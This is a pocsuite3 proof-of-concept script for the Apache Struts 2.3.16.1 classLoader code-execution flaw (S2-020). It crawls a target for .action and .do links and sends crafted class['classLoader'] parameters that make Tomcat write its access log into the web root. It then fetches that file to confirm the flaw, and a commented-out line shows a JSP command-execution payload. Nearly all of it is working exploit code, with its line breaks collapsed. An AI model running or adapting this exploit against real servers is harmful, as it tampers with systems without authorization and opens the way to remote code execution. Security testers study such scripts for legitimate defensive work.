Struts 2.3.16.1 代码执行漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import base64 import re from urllib.parse import urlparse from urllib.parse import urljoin import time class DemoPOC(POCBase): vulID = '1228' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-23' createDate = '2014-04-23' updateDate = '2014-04-23' references = ['http://sec.baidu.com/index.php?research/detail/id/18'] name = 'struts 2.3.16.1 代码执行漏洞 POC' appPowerLink = 'http://struts.apache.org/' appName = 'struts' appVersion = '2.3.16.1#' vulType = 'Code Execution' desc = ''' ''' samples = [] install_requires = [''] def getLink(self, url): '''使用正则得到页面中.action和.do链接''' rnt = [] page_content = requests.get(url).text match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:action|do))''', page_content) for item_url in match: if 'http' not in item_url: item_url = urljoin(url, item_url) rnt.append(item_url) return rnt def _verify(self): result = {} url = self.url if url.endswith('.do') or url.endswith('.action'): url_actions = [url] else: url = url.strip('/') + '/' url_actions = self.getLink(url) if not url_actions: url_actions = [url] for url_action in url_actions: directory_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.directory=webapps/ROOT" prefix_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.prefix=S2_020" suffix_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.suffix=.txt" filedataformat_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.fileDateFormat=1" # cmd = url + 'aaaa.jsp?a=<%Runtime.getRuntime().exec("cmd /c dir");%>' shelljsp_url = urljoin(url_action, '/') + 'S2_0201.txt' try: directory_request = requests.get(directory_url) time.sleep(1) prefix_request = requests.get(prefix_url) time.sleep(1) suffix_request = requests.get(suffix_url) time.sleep(1) filedataformat_request = requests.get(filedataformat_url) time.sleep(10) shell_request = requests.get(shelljsp_url) shell_content = shell_request.text match = re.search('context.parent.pipeline.first.fileDateFormat=1', shell_content) if match: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = shelljsp_url except Exception as e: logger.debug(str(e)) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() register_poc(DemoPOC)